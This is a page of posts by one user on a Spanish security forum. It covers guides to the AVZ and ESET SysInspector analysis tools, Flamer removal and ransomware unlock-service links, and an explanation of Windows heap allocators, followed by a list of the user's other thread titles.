Expongo las capturas del downloader, si es el caso se añadirán más ejemplos.

Primer paso del instalador:

Pasando a modo personalizado para poder destildar los casilleros correspondientes de instalación de basura:

Aqui ya destildado ya podemos proceder a instalar el programa de forma segura:

Cada cierto tiempo cambian el esponsor, supongo el que de más dinero es el que sale en sus instaladores.
Casi todos los instaladores de éste tipo y que sean de compañias medio/conocidas nos darán ésta opción de eliminar la instalación de barras de publicidad.

Saludos.

#356

Seguridad / Tutorial de análisis de sistemas con AVZ Antiviral Toolkit de Kaspersky

21 Julio 2012, 02:08 AM

** Faltan algunas descripciones que en breve se añadirán y subirlo al ftp para descarga en pdf, mientras quien quiera probar puede analizar su equipo y subir un log al sub-foro de seguridad!!!

Guia de análisis de sistemas con AVZ Antiviral Toolkit de Kaspersky

AVZ es una herramienta de análisis avanzada que se va actualizando periódicamente desde la base de datos de Kaspersky. Se creó con el objetivo de analizar un equipo a fondo de la misma forma que lo suele hacer un antivirus, pero a su vez contiene una buena cantidad de opciones para extraer datos generando log´s para su posterior examen.
Desde Kaspersky utilizan AVZ para los usuarios que usan sus productos de seguridad y aun así están infectados. Desde la página oficial ofrecen un breve tutorial al respecto que puede serle útil a usuarios con soluciones de Kaspersky. Desde este link podemos ver la guia:

http://support.kaspersky.com/sp/faq/?qid=208279710

Con ésta herramienta podemos analizar nuestro sistema en busca de infecciones de todo tipo, tanto en sistema de archivos, registro y sectores de arranque en discos. También es capaz de realizar consultas y extraer mucha información del equipo a analizar que nos será de utilidad.
Como opciones podemos encontrar la detección de ganchos (modos: User y Kernel), típicos de los Rootkit (API hooking) y posterior bloqueo de éstos.

Otro elemento es el análisis extendido de la heurística, donde se pueden encontrar infecciones sin tener un firma catalogada que lo delate, ya sea por comportamiento, inyección, etc.
Contiene una opción para bloquear la ejecución de medios extraibles (AVZGuard).
Aunque es opcional es muy aconsejable instalar un driver específico para el análisis exhaustivo del equipo (AVZPM), una vez eliminadas las infecciones encontradas se desactiva y listo, ya que AVZ no instala nada en el equipo, es portable.

CitarAdvertencia:
Esta herramienta no es para jugar, puedes utilizar todas y cada una de las opciones de análisis, saca tus log´s de registro, pero intenta no hacer modificaciones ni eliminar nada a lo loco a no ser sepas lo que estas haciendo o un moderador/administrador del foro te lo indique.

Descargar AVZ:

Link: http://z-oleg.com/avz4.zip
Plugins (descargar solo en caso necesario...):
AVZ_SE: http://z-oleg.com/avz_se.zip
AVZ4_The_Bat: http://z-oleg.com/avz4thebat.zip
Wiki.ru: http://ru.wikipedia.org/wiki/AVZ
Guia rápida: http://support.kaspersky.com/sp/faq/?qid=208279710

Actualizar AVZ (recomendado actualización automática):

Automático: Desde el menú principal: File --> Database Update (De esta forma no hace falta descargar el archivo "base").
Manual: El contenido de la carpeta Base tiene que ser "substituido" en la carpeta principal del AVZ (donde lo descargaste). El archivo "base" son las actualizaciones
Link: http://z-oleg.com/secur/avz_up/avzbase.zip (este archivo son las últimas actualizaciones)

Una vez actualizado iniciamos el programa desde "AVZ.exe".

Comenzaremos instalando un driver específico para la monitorización del sistema (no hay que descargar nada):

En el menu superior, ir hasta la pestaña AVZPM y activar el driver desde la primera casilla.
Yo en mi caso ya lo instalé, cuando ya se acabe de analizar y eliminar si hubiera algo, se desinstala el AVZ.
Recuerda desintalarlo, pues si luego analizas con otras tools (sobre todo anti-rootkit) te advertirán de este driver, aunque con omitir el aviso ya está.

Ventana principal:

- Menu principal;

- File:

- Start/Pause/Stop scanning: Inicia, pausa o detiene el análisis del sistema.
-------------------------------------
- System Analysis: Análisis independiente sobre áreas específicas del sistema de archivos con opciones para procesos y servicios. Guarda un log en formato html (htm).
- System Restore: Opciones de restauración de las configuraciones originales de windows (cambio de extensiones en ficheros, configuraciones de I.Explorer, entrar en modo seguro, desbloquear administrador de tareas y registro, reemplazo de DNS,etc).
- Backup: Opción de hacer un respaldo de ficheros de configuración esenciales para el buen funcionamiento de Windows (configuraciones SPI/LSP, asociación de archivos, configuración de I.Explorer, el Firewall, drivers y servicioos, protocolo TCP/IP). Estos respaldos se realizan en formato de archivo .reg y serán guardados en la carpeta ...avz4\Backup.
- Disc Inspector:
- Troubleshooting wizard:
-------------------------------------
- Standard scripts: Scripts pre-establecidos. Dependiendo del script utilizado veremos que en la ventana del AVZ se nos darán los datos correspondientes que podremos salvar a un log y subirlo al foro, por ejemplo.
- Custom scripts: Trabajar con un script creado, nos dará la opción de ejecutarlo y revisar la sintaxis del código.
-------------------------------------
- Database Update: Actualizar la base de firmas automáticamente.
-------------------------------------
- View souspicious objects list: Ver listado de archivos sospechos (se genera después de un análisis).
- Save log: Guardar un log de registro de los datos proporcionados por AVZ
- Clear log: Limipar el log de registro creado.
-------------------------------------
- Infected Folder Viewer: Ver listado de carpetas infectadas.
- Quarantine Folder Viewer: Ver carpeta de objetos sospechosos en cuarentena.
- Copy files to Quarantine by inputting their list:
- Automatic Qaurantining:
-------------------------------------
- Delayed File Deleting: Opción para eliminar archivos.
-------------------------------------
- Save configuration profile: Guarda un perfil creado en función de los parámetros modificados para el análisis.
- Load configuration profile: Carga un perfil guardado previamente
-------------------------------------
- Exit: Salir y cerrar AVZ.

- Service:
- Process Manager:
- Services and Drivers Manager:
- Kernel Space Modules Viewer:
- Injected DLLs Manager:
-------------------------------------
- Registry Search:
- File Search:
- Cookies Search:
-------------------------------------
- Autoruns Manager:
- IE Extensions Manager (BHOs, Toolbars):
- Control Panel Applets (CPL) Manager:
- Windows Explorer Extensions Manager:
- Printing System Extensions Manager:
- Task Schaeduler Jobs Manager:
- Protocolos and Handlers Manager:
- Downloaded Program Files Manager:
-------------------------------------
- Winsock SPI (LSP,NSP,TSP) Manager:
- Hosts File Manager:
- Open TCP/UDP Ports Viewer:
- Shared Resources and Network Sessions Manager:
-------------------------------------
- System Utilities:
- Regedit - Registry editor
- MsConfig - System setup
- SFC - Check system files
-------------------------------------
- Check file by Trusted Objects Database
- Check file authenticity by Microsoft Security Catalogue
- Compute MD5 hash of a file

- AVZGuard:
- Enable AVZGuard:
- Run application as trusted:
- Disable AVZGuard:

- AVZPM:
- Install extended monitoring driver:
- Delete extended monitoring driver:
- Delete and unload extended monitoring driver:

- Help: Archivo de ayuda incluido en inglés.

Identificación de unidades y carpetas a selecionar para el análisis.

- Search scope: Identificación unidades de discos y carpetas a selecionar para el análisis.

- File types: Configuración del tipo de archivos a analizar (dejar por defecto).

- Search parameters: Aquí se configuran diferentes parámetros divididos en apartados:

* Análisis heurístico (Heuristic analysis): Selección del análisis heurístico pudiendo utilizar el análisis extendido.
* Módulo anti-rootkit (AntiRootkit):
* Verificación de modificaciones en SPI (Service Provider Interface):
* Search for keyloggers:
* Search for TCP/UDP ports used by Trojan horses:
* Fix system errors automatically

Activar:
* Fix SPI/LSP errors automatically (Winsock Service Provider)
* Search for TCP/UDP ports used by Trojan horses
* Fix system errors automatically (opcional)

- Automatic actions:

Enable malware removal mode: Al habilitar éste módulo, AVZ eliminará directamente las infecciones detectadas en función de la configuración elegida. Podemos elegir que elimine lo encontrado o nos pregunte que hacer.

Para cada tipo de malware encontrado durante el análisis tendremos tres opciones automáticas.
Viruses, AdvWare, Spy/Spyware y Dialer/PorWare lo dejaremos en "Remove" para que elimine los archivos infectados, pero para HackTool y RiskWare, pues bueno puede ir en función de si tienes algunos crack´s o keygen´s y éste los detectará y avisará al usuario de que el archivo "puede" tener un riesgo alto.
Que advierta no quiere decir que esté infectado, de ahí que por defecto venga como "Report Only". Si no sueles usar éste tipo de archivos, es mejor modificar la opción y que elimine lo que encuentre.
Opcionalmente tenemos dos opciones destildadas que podemos añadir si queremos que envie los archivos sospechosos a la cuarentena o enviar los archivos infectados a la carpeta por defecto "Infected".

* Log;

En la ventana del log´s podremos ir viendo conforme se analiza el equipo todos los datos que va encontrando, una vez terminado podemos utlizar los botones del panel derecho para:

- Guardar un log en un lugar predeterminado.
- Ver los objetos detectados en el análisis del equipo.
- Limpiar el campo del log de los datos genarados.
- Actualizar la base de datos (otra forma...).

Log de ejemplo solo con las cabeceras (Este log lo hice sin actualizar la base de datos para que se vea la advertencia, en tal caso actualizar y volver a escanear el PC):

CitarAttention !!! Database was last updated 07/08/2011 it is necessary to update the database (via File - Database update)
AVZ Antiviral Toolkit log; AVZ version is 4.35
Scanning started at 22.08.2011 19:12:05
Database loaded: signatures - 293350, NN profile(s) - 2, malware removal microprograms - 56, signature database released 07.08.2011 20:12
Heuristic microprograms loaded: 388
PVS microprograms loaded: 9
Digital signatures of system files loaded: 290168
Heuristic analyzer mode: Medium heuristics mode
Malware removal mode: disabled
Windows version is: 5.1.2600, Service Pack 3 ; AVZ is run with administrator rights
System Restore: Disabled

Terminado de configurar clickamos sobre el boton

y esperamos a que analice el sistema...
Donde más se puede demorar el tiempo de análisis es cuando configuremos al máximo nivel el análisis extendido de heurística. Una vez terminado guardamos el log.

Opcionalmente el administrador/m-oderador que lleve tu tema puede pedirte otros datos más concretos como procesos en ejecución, drivers instalados, contenido del archivo Hosts de Windows, etc.
De todas las opciones que se pidan se guradará un log desde el icono y se subirá el reporte al tema.
Aquí una guia de como sacar esa información desde la herramienta AVZ (desde el menu principal del AVZ):

*   Procesos en ejecución: Service --> Process Manager
*   Servicios y drivers: Service --> Services and drivers manager
*   Autorun: Service --> Autoruns Manager
*   Hosts: Service --> Hosts file Manager
*   Conexiones: Service --> Open TCP/UDP Ports Viewer

Si hacen falta añadir otras opciones de configuración se irá añadiendo a este tema, para no tener la información desperdigada.

Saludos.

EHN

#357

Seguridad / Como eliminar el troyano Flamer (32 y 64 bits)

20 Julio 2012, 21:26 PM

Herramienta de BitDefender para eliminar este nuevo malware, está disponible para sistemas de 32 y 64 bits.

x32: http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=TrojanFlamer_BDRemovalToolDropper_x86.exe

x64: http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=TrojanFlamer_BDRemovalToolDropper_x64.exe

Link: http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

Cualquier tema relacionado con una infección con éste malware abrir un nuevo tema.

Saludos.

#358

Seguridad / Tutorial de análisis del PC con SysInspector de ESET

18 Julio 2012, 19:15 PM

Breve tutorial de análisis con la herramienta SysInspector de Eset.

Link: http://www.eset-la.com/support/sysinspector.php

Versión en Español;
ESET SysInspector 32-bit:    http://download.eset.com/download/sysinspector/32/ESN/SysInspector.exe
ESET SysInspector 64-bit:    http://download.eset.com/download/sysinspector/64/ESN/SysInspector.exe

Versión en Ingles;
ESET SysInspector 32-bit:    http://download.eset.com/download/sysinspector/32/ENU/SysInspector.exe
ESET SysInspector 64-bit:    http://download.eset.com/download/sysinspector/64/ENU/SysInspector.exe

ESET SysInspector es un software gratuito desarrollado por ESET que permite recolectar información crítica relacionada a determinadas
actividades que se realizan en un sistema operativo. Extrae todos los datos posibles, para poder tener un mayor control de que aplicaciones
están ejecutándose, el uso de librerías, quien las utiliza, conexiones de red y alguna cosilla más que iremos viendo sobre la marcha.

"ESET SysInspector está concebido como herramienta de análisis y no como herramienta
de desinfección o reparación de los daños ocasionados por códigos maliciosos u otras aplicaciones"

No necesita privilegios de Administrador para ser ejecutado, pero la cantidad y
detallle de información que suministre dependerá de los permisos que posea el usuario que lo ejecute.

Ejecutando ESET SysInspector : hay que aceptar el acuerdo de licencia...

• Interfaz principal:

El metodo de filtrado utilizado consiste en mostrar los procesos/datos asignando un color según su peligrosidad:

Verde: Aplicación conocida (fiable)
Naranja: Aplicación dudosa o con modificaciones en el archivo original (no por ello un virus)
Rojo: Vendría a ser un proceso no reconocido o peligroso (no por ello un virus).

En la ventana de la izquierda nos mostrará toda la información obtenida del sistema. Haremos un click sobre la descripción que queramos visualizar y en la ventana de la derecha podrás ver todo lo relacionado a ese proceso/archivo.
Arriba a la derecha tenemos un menú para administrar los log´s, filtrado por elementos, comparativas...

Para cualquier duda puedes consultar el archivo de "ayuda" incluido, accediendo al Menu/Ayuda (superior/derecha) o pulsando F1.

• Procesos en ejecución :

Todos los procesos que actualmente se ejecutan en tu Pc estarán aquí (algunos Rootkit pueden no aparecer...). Haremos un click sobre un proceso aleatorio o sospechoso y en la ventana de la derecha, abajo nos mostrará información sobre quien utiliza la aplicación, su PID (identificador de proceso), modo de ejecución (administrador, usuario...).
Haciendo doble click sobre el proceso, nos mostrará las dependencias del archivo (archivos de librerías utilizados y otros relacionados con él).
Es "muy importante" fijarse en los archivos que crean conexiones externas, como son: svchost.exe, lsaas.exe, al clickar sobre ellos, en la ventana de información nos mostrará las IP´s que utiliza en las conexiones y el estado (listen, established, etc). Estas IP´s tendrán que ser las normales de tu red (ejemplo: 127.0.01; 0.0.0.0).
Si utilizas maquinas virtuales se asignara una diferente (ejemplo: 10.02.0.14)
Sobre svchost.exe, hay que mencionar que puedes tener múltiples instancias en ejecución, pues cada uno sirve para una tarea diferente (actualizaciones, red...), pero nunca con diferente nombre, es decir "svcchost.exe", "svhost.exe" pues esto te indicaría la presencia de un "troyano" o similar.

• Conexiones de red :

En éste apartado podremos observar que programas crean una conexión, divididas por el protocolo utilizado (TCP/UDP). Dependiendo de los programas utilizados mostrará más o menos conexiones, pero para una pc normal de casa, sólo tendrían que haber las conexiones utilizadas por el sistema operativo ( System, lsaas.exe, svchost.exe y alg.exe), suponiendo que el navegador y todo programa que se conecte a internet estén cerrados. Las IP´s contenidas en ésta categoría tendrían que ser las normales utilizadas en tu red, ( 0.0.0.0 , 127.0.0.1 ,192.168.x.x), ésta última puede variar en función de tu proveedor de internet (ISP).
Un dato importante sería el asociar cualquier proceso que corre en la máquina con su identificador (PID).
Para entenderlo mejor haremos lo siguiente : ve a <Inicio> y clicka en <Ejecutar>, en ésa ventana escribe cmd y pulsamos <Intro> para acceder a la consola de comandos.
Usaremos el comando netstat. Para dudas escribir "netstat ?". Escribiremos "netstat –aon" (un espacio entre netstat y -aon) y pulsamos <Intro> para poder ver las conexiones activas. Nos encontramos ante cinco descripciones donde se nos muestra el protocolo que utiliza en la conexión, direcciones IP remota y local, el estado y el PID. Si tienes algún P2P conectado, mejor ciérralo pues te vas a volver loco con tanta conexión. Siempre tendrás alguna conexión en estado "Listening" (Escuchando), que son normalmente <svchost> y <lsaas> en los diferentes puertos utilizados (135; 443; 139;1025) . También mostrará las conexiones establecidas (Established) que son las que nos interesan, como son el navegador, el ftp y todo lo que se conecte a Internet:

Si algún proceso mostrado en Eset-SysInspector te resulta sospechoso, no tienes más que poner el nombre del proceso en "Google" (ejemplo: svchost.exe) y buscar información sobre el proceso. Hay páginas Web dedicadas a esto. Cuando Google te muestre los links referentes al proceso, busca que pertenezcan a los siguientes enlaces pues son bastante fiables:

http://www.alegsa.com.ar/index.php
http://www.processlibrary.com/es/
http://www.file.net/

• Entradas de registro importantes:

En este apartado se extraen algunas entradas del registro, sobre todo las relacionadas con:
- Programas de arranque junto al S.O
- Configuraciones del navegador
- Listado de drivers con asociación de archivo
- Algunas configuraciones del antivirus instalado
- Configuraciones de la red.

• Servicios:

Conexiones con dispositivos, instancias internas del S.O, etc.
Muestra la descripción del proceso, ruta en disco, modo de inicio, estado del dispositivo, descripción del servicio y nombre de la compañía/empresa.
Los servicios normales utilizados por el S.O y aquellas aplicaciones conocidas estarán marcadas en verde.
Hay que tener en cuenta que ciertos drivers/servicios pueden aparecer de color naranja o incluso rojo y no por ello quiere decir que el sistema esté infectado. En estos casos nos veremos obligados a buscar en google información sobre el nombre del proceso, carpeta de instalación y sobre todo si se trata de un servicio esencial del S.O, en este caso no se debería desactivar.
Para gestionar los servicios en Windows, haremos uso del comando "services.msc" en Inicio --> Ejecutar

Para desactivar algún servicio haremos click sobre el proceso y si da la opción desde el menú contextual, procederemos a "desactivar" el servicio. Se puede dar el caso de que no muestre la opción, entonces clickamos sobre "Propiedades" en ese mismo menú contextual, y ahora podremos elegir la opción de detener o incluso eliminarlo.
Es muy importante que verifiques que el servicio no lo ejecute ninguna aplicación de Windows o otros programas, es preferible informarse bien y luego realizar la acción.

• Controladores:

Aquí podremos ver todos los drivers/controladores de los dispositivos, ya estén en "ejecución" o "detenidos".

• Archivos críticos:

En esta sección podremos ver tres apartados: <win.ini>, <system.ini> y el archivo de <hosts>. Los analizaremos por separado pues éstos son muy importantes para el buen funcionamiento del sistema. La carga de controladores, etc, que hacen los archivos <win.ini> y <System.ini> los podremos ver en la "Utilidad de configuración del sistema". Para esto haremos click en "Inicio", clickamos en "Ejecutar", en la ventana nueva escribiremos msconfig y aceptamos. Ahora veremos una ventana como ésta :

<win.ini> : Este archivo es leído por Windows al iniciar el sistema. Contiene datos acerca del hardware instalado y el entorno actual utilizado (escritorio, etc). En el log de SysInspector tendrían que estar todas las entradas marcadas en verde, pues Eset las reconoce como verdaderas. Cualquier entrada en color rojo tendría que ser revisada y/o corregida.
<system.ini> : Este archivo también se carga al iniciar Windows y está directamente relacionado con <msconfig>. La tarea principal es la de mostrarle a Windows los archivos de los controladores instalados (drivers). En el log de Eset también tendrían que estar en verde todas las entradas.
<hosts> : Dependiendo del tipo de infección (en caso hipotético) este archivo será modificado para redireccionar y/o modificar todas las peticiones de tu navegador. En el log de Eset solo tendría que aparecer una línea con la dirección de tu red (normalmente 127.0.0.1) y marcada en verde. (dependerá también del tipo de red o redes configuradas, esto como administrador tendrás que averiguarlo por tu cuenta).

Dejo un ejemplo de un análisis en la computadora infectada de un amigo:

Esta es de una infección posterior:

Como podemos ver, aparte de la línea marcada en verde "127.0.0.1 localhost", hay otras entradas que no son validas que son las marcadas en rojo. Ahora para comprobarlo manualmente abriremos el archivo de hosts en la siguiente ubicación: C:\WINDOWS\System32\drivers\etc, para abrirlo haz doble click y elige abrir con el bloc de notas. Veras un archivo de texto como éste:

• System Scheduler Tasks:

En esta sección se enumerarían las tareas programadas en el S.O. Si no tienes ninguna tarea cotidiana, aparecerá en blanco...

• Información del sistema:

• Detalles del archivo:

• Ejemplos:

Esto es un ejemplo de un análisis con entradas marcadas en color rojo (supuestamente sospechosas), pero no es por ninguna infección, al no estar reconocido en las bases de datos de Eset este es un servicio de dudosa procedencia y de ahí que lo filtre como peligroso.
En esta captura podemos observar varios procesos en ejecucuión que SysInspector toma como sospechosos.
Ahora tocaría buscar info sobre esos procesos para ver que aplicación se encarga de ejecutarlas. Estos procesos son de un SAI (Sistema de Alimentación Ininterrumpida). En el casillero de abajo/derecha podrás ver cierta información interesante sobre cada proceso, dependencias...

Creo no haber olvidado nada, en cualquier caso se ampliaría o modificaría

Reconocimiento - NoComercial (by-nc): Se permite la generación de obras derivadas siempre que no se haga un usocomercial. Tampoco se puede utilizar la obra original con finalidades comerciales.

Con la colaboración de Skapunky.
Un saludo.

#359

Programación C/C++ / Sobre los "Heap" en Windows

18 Julio 2012, 18:54 PM

Hola a todos estuve buscando información sobre los heap de Windows, me resultó curioso y encontré un texto bastante explicativo al respecto, también se incluyen referéncias hacia la msdn y wiki por alguna duda en concreto. Se incluye un programa para ver los heap de cada proceso, en sí la herramienta no tiene mucho misterio.

* Referencias:

+ http://msdn.microsoft.com/en-us/library/aa366711%28v=vs.85%29.aspx

+ http://msdn.microsoft.com/en-us/library/aa366750%28v=vs.85%29.aspx

+ http://en.wikipedia.org/wiki/Dynamic_memory_allocation

Introduccion al heap de Windows:

En Windows Vista el tipo de heap que las aplicaciones usan por defecto es el llamado low-fragmentation heap. Esta situacion es diferente a la que
nos podemos encontrar en otras versiones de Windows. Pero, ¿Que es esto del low-fragmentation heap?¿Que beneficios aporta?

En este post voy a intentar despejar estas incognitas al mismo tiempo que doy una vision global de como funciona el Heap de Windows.
En Windows el heap tiene dos niveles bien diferenciados. El primero de ellos se llama el back end Allocator, mientras que el segundo nivel se deno
mina front end Allocator.

El back end Allocator proporciona una implementacion sencilla y flexible. Estableciendo un paralelismo con el campo de la algoritmica podriamos decir que el back end allocator es una especie de "Uninformed allocator" en el sentido de que no trata de dar ventaja a unas situaciones respecto a otras. El back end allocator organiza la memoria que gestiona en diferentes segmentos que reserva a traves de las funciones del sistema operativo destinadas al tratamiento de la memoria virtual (vg. ZwAllocateVirtualMemory). Estos segmentos contienen las diferentes reservas de memoria que los usuarios requieren. El heap tiene una granularidad (normalmente de ocho bytes, lo que quiere decir que toda reserva de memoria en el heap sera necesariamente de tamaño multiplo de ocho) que asegura el alineamiento y simplifica la gestion. Para cada bloque existe una cabecera con diversa informacion.

La cabecera indica el tamaño del bloque y el tamaño del bloque anterior. De esta forma los bloques contiguos estan enlazados entre si. La cabecera tambien indica si un bloque de memoria esta en uso o libre. Con esta informacion el back end allocator es capaz de unir los bloques libres contiguos para formar bloques mas grandes y para de esta forma combatir la fragmentacion. El back end allocator gestiona otras dos estructuras de importancia. Un array de listas doblemente enlazadas que agrupan bloques libres de igual tamaño y un bitmap que indica si para una entrada del array anterior la lista doblemente enlazada contiene o no bloques disponibles. Con estas dos estructuras el back end allocator es capaz de mantener el heap sin una fragmentacion excesiva, puesto que es capaz de elegir el mejor bloque de los libres disponibles para satisfacer la demanda de un usuario.

Hay peticiones de memoria que por ser demasiado grandes no son gestionadas por este sistema de listas. En estos casos la peticion de memoria se satisface directamente a traves de las funciones de gestion de memoria virtual del sistema operativo. Ademas de los aspectos basicos sobre la algoritmia del back end allocator que he descrito antes, este allocator permite diferentes modos de funcionamiento dependiendo de los flags usados en la creacion del heap y en el momento de una reserva concreta por parte del usuario. Por ejemplo, el heap puede ser inicializado con sincronia interna o sin sincronia en caso de que el usuario gestione la sincronia por su cuenta. El heap tambien puede crecer segun sus necesidades o tener un tamaño fijo. Puede tener activadas diferentes opciones de depuracion. O puede tener asignada una direccion fija asignada por el usuario. Este ultimo caso de uso muy poco comun pero muy util para mapear heaps sobre ficheros mapeados en memoria, pudiendo compartir el heap entre varios procesos.
Esta es la tecnica usada por muchos componentes de Windows para el paso de mensajes de gran tamaño. El ejemplo mas clasico es la comunicacion que se establece entre el CSRSS y los procesos del subsistema. Otras de las funcionalidades no demasiado conocidas que proporciona algunas implementaciones del heap de windows es la posibilidad de cifrar las cabeceras de los heaps mediante un XOR con un numero aleatorio obtenido en el momento de creacion del propio heap.

El front end Allocator es una capa por encima del back end allocator que pretende proporcionar algoritmos que se adapten a las necesidades especificas de diferentes aplicaciones. Windows proporciona dos front end allocators diferentes. El primero de ellos se denomina Look Aside List allocator y el segundo se denominar Low Fragmentation allocator. Tambien se puede dedicir no usar ninguno de los dos Frond End Allocators disponibles. La mayor parte de las versiones de Windows usan el Look Aside List Allocator como Front end allocator por defecto, pero Windows vista usa el Low Fragmentation heap como Front end Allocator, y parece que las sucesivas versiones de sistemas operativos NT seguiran esta misma linea. De los dos front end allocators disponibles, el Look Aside list allocator es el mas sencillo. El Look Aside list allocator cuenta con un array de listas enlazadas que son thread-safe. Estas listas se basan en una estructura de datos de caracter general conocida como "sequenced singly linked list". Cuando un usuario lleva a cabo la peticion de un nuevo bloque, el look aside list allocator trata de satisfacer la peticion usando estas listas. Si la peticion no se puede satisfacer entonces se intenta satisfar a traves del back end allocator. Cuando el usuario libera un bloque de memoria, el look aside list allocator guarda el bloque para poder atender posteriormente nuevas peticiones. Si el front end allocator no puede gestionar el bloque en sus listas, entonces pide al back end allocator su liberacion. Este allocator proporciona algunas ventajas respecto al uso del back end allocator, pero tambien plantea algunos problemas. La principal de las ventajas es que para satisfacer una peticion de reserva a traves del Look Aside List allocator no es necesario bloquear el heap, puesto que las listas que usa son seguras. Esto nos proporciona un mayor rendimiento en entornos multithread, puesto que el back end allocator serializaria las peticiones de los usuarios. La principal desventaja es que los bloques gestionados por el look aside list allocator no son liberados y permanencen en uso desde el punto de vista del back end allocator. En esta situacion los bloques libres contiguos no pueden ser unidos. Por tanto, el look aside list allocator proporciona un rendimiento mayor pero tambien provoca una mayor fragmentacion del heap.

El low fragmentation heap allocator pone sobre el tapete un algoritmo relativamente complejo que pretende aunar las ventajas tanto del Look Aside List allocator como del algoritmo expuesto por el back end allocator. Una de las primeras cosas que diferencia este allocator es la granularidad variable. Si en el back end allocator ( y por ende en el Look Aside allcoator) la granularidad del heap es normalmente de ocho bytes, y es asi independientemente de los tamaños de las reservas de los usuarios, el low fragmentation allocator tiene una granularidad variable, que aumenta gradualmente al aumentar los tamaños de las peticiones. Esto le permite gestionar mejor los bloques de memoria, haciendo a veces pequeños gastos extra de memoria, pero evitando la fragmentacion y acelerando el proceso de reserva. Este allocator gestiona las reservas de memoria de diferentes tamaños de forma indpendiente. De esta forma solo tiene que sincronizar el acceso para alojos del mismo tamaño. Pero esto tambien le obliga a implementar objetos mas complejos para satisfacer las peticiones de un mismo tamaño. Si alguno de los que han comenzado a leer esto ha llegado hasta aqui y ademas ha programado drivers para
versiones antiguas de Windows, seguramente recuerde las estructuras del kernel conocidas como zonas. Una zona es, simplificando mucho, un heap en el que las reservas son de un tamaño fijo establecido en el momento de creacion de la zona. Bien, basicamente el low fragmentation heap redondea el tamaño de la peticion de reserva conforme a la granularidad que le toca y seguidamente lleva a cabo la reserva en una zona. Al definir zonas de memoria especificas para los diferentes tamaños de reserva intenta minimizar la fragmentacion aunque aumenta la cantida de memoria que necesita para las esturcturas de control. La granularidad variable permite minimizar el numero de tamaños de reserva minimizando asi el numero de zonas que es necesario gestionar. El ultimo punto clave que diferencia el low fragmentation heap es la gestion de la sincronia. El Look Aside List allocator basa su sincronia en las listas enlazadas que hemos comentado, que son una estructura de datos de uso general. El back end allocator basa su sincronia en un objeto de
sincronia estandar, una sección critica. En cambio, el low fragmentation heap implementa internamente su propia sincronia , no apoyandose en objetos proporcionados por el sistema operativo o en estructuras de datos genericas. Uno de los objetivos de esta implementacion es el poder saber si el hilo que lleva a cabo la reserva esta viendose obligado a esperar por otro hilo que esta llevando a cabo otra rerseva del mismo tamaño. Cuando un hilo se ve obligado a esperar por primera vez, entonces el low fragmentation heap generara una zona auxiliar para uso exclusivo de este hilo, evitando que en el futuro se vuelva a tener que esperar. Al disponer de una granularidad variable las posibilidades de colision aumentan pero disminuyen la cantidad de estructuras que potencialmente se podrian llegar a duplicar.

Uniendo todos los aspectos expuestos sobre el low fragmentation allocator, podemos ver que pretende minimizar la perdida de rendimiento debido a la serializacion en entornos multithread, y lo hace detectando las situaciones de colision y solucionandolas mediante estructuras auxilieras. Al mismo tiempo intenta minimizar la fragmentacion mediante el uso de zonas. El low fragmentation heap plantea cosas interesantes pero es dificil saber a priori cual es el front end allocator adecuado para una aplicacion dada. En la practica los desarrolladores deberan probar los diferentes allocators para sus aplicaciones con el fin de averiguar cual es el que le proporciona mejores resultados. Una de las ventajas que he visto empiricamente es que este allocator suele comportarse mejor con aplicaciones cuyo uso de memoria es bastante determinista. Cuano el uso de memoria es herratico, entonces no parece haber una diferencia apreciable entre ninguno de los dos front end heaps. El low fragmentation heap hace mas visibles los bugs, pero tambien mas dificiles de analizar debido a que su funcionamiento es menos determinista.

Por otro lado actualmente no existen (o al menos yo no las conozco) pruebas de concepto que exploten overlows u otro tipo de erroresen low fragmentation heaps. Claro que esta situacion se me antoja efimera, puesto que no he visto mayor problema en hacerlo. Y aqui pongo el punto y final a esta pequeña introduccion al heap de windows. He intentando centrarme ligeramente en el punto de vista del programador

Autor del texto: 48 bits

Para poder leer los Heap cargados en la memoria, podemos hacer uso de esta tool:

Peso: 1,54 MB
S.O: XP/Vista/7
Link: http://securityxploded.com/ProcHeapViewer.php
Descarga directa: http://securityxploded.com/getfile_plus.php?id=7211
Dentro de la carpeta encontrarás la versión para instalar y la versión portable.
Mas info: http://securityxploded.com/ProcHeapViewer.php (en Ingles)

#360

Seguridad / Servicios online para desbloquear Ransomware

12 Julio 2012, 23:49 PM

Desde los siguientes servicios online podemos obtener un código de desbloqueo ante la amenaza de un programa secuestrador:

Kaspersky: http://support.kaspersky.com/viruses/deblocker (inglés)

VirusInfo: http://virusinfo.info/deblocker/ (ruso)

Dr.Web: https://www.drweb.com/xperf/unlocker/ (inglés)

Eset: http://www.esetnod32.ru/.support/winlock/ (ruso)

Seguir las instrucciones de cada servicio, en inglés o ruso.
Dichos links se añadirán junto a otros nuevos servicios en la nueva actualización del AIO de la comunidad.

Saludos.

Páginas 1 2 3 4 5 6 7 8 9

Test Foro de elhacker.net SMF 2.1

Mostrar Mensajes

Temas - r32

Seguridad / Malware spreading via Steam chat

Noticias / Norse: Servicio online para ver ataques a nivel mundial.

Criptografía / Leccion 3 del MOOC de Crypt4you: Introducción a Bitcoin

Noticias / Hacia una evaluación eficaz de la seguridad en ICS

Noticias / Vulnerabilidad en Drupal deja a millones de sitios web en peligro

Noticias / CSC: Controles de Seguridad Críticos para la ciberdefensa

Noticias / Las 5 mejoras de seguridad de Android Lollipop

Noticias / Dos hilos, una aplicación: explotación en Android

Noticias / Swedish hacker finds 'serious' vulnerability in OS X Yosemite

Noticias / ¿Qué son las botnets y cómo combatirlas?

Noticias / Top 5 de botnets zombi más aterradoras

Noticias / Ekoparty: “¿Cómo hackear sistemas de control de tráfico en grandes ciudades?”

Noticias / Explotación práctica de señales de radio con Software Defined Radio

Seguridad / Servicios online para analizar el pc, páginas web y archivos

Seguridad / Servicios VPN gratuitos (Windows, Mac, Mobile)

Noticias / Cajeros automáticos infectados regalan millones de dólares sin tarjetas de crédi

Análisis y Diseño de Malware / Trojan Banker - Segue em anexo a 2 via do boleto, Dpto Juridico.

Seguridad / Servicio online para verificar si tu cuenta de gmail está entre las robadas

Noticias / Piratear antenas de telefonía móvil ¿el próximo gran objetivo de los hackers?

GNU/Linux / Qubes OS (R2 rc2) Sistema operativo virtualizado

Análisis y Diseño de Malware / BoletoSetembro.cpl

Seguridad / Encuesta: En que fallan los antivirus?

Seguridad / WinRAR File Extension Spoofing vulnerability

Noticias / Cyberthreat Map (Mapa en tiempo real - Malware)

